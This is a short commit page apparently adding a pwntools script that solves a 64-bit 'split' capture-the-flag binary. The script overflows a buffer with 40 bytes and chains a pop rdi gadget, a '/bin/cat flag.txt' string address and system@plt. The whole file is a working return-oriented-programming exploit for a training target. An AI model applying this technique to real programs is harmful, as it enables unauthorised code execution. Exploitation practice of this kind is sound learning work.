exploit for 64-bit split binary

AravGarg · Mar 28, 2020 · dedaf16 · dedaf16
1 parent 044770a
commit dedaf16
Showing 1 changed file with 18 additions and 0 deletions.
diff --git a/split64.py b/split64.py
@@ -0,0 +1,18 @@
+from pwn import *
+target=process('./split')
+
+payload="A"*40
+
+#address of "/bin/cat flag.txt"
+string=0x601060
+
+poprdi=0x400883
+system_plt=0x4005e0
+
+payload+=p64(poprdi)
+payload+=p64(string)
+payload+=p64(system_plt)
+
+target.sendline(payload)
+target.interactive()
+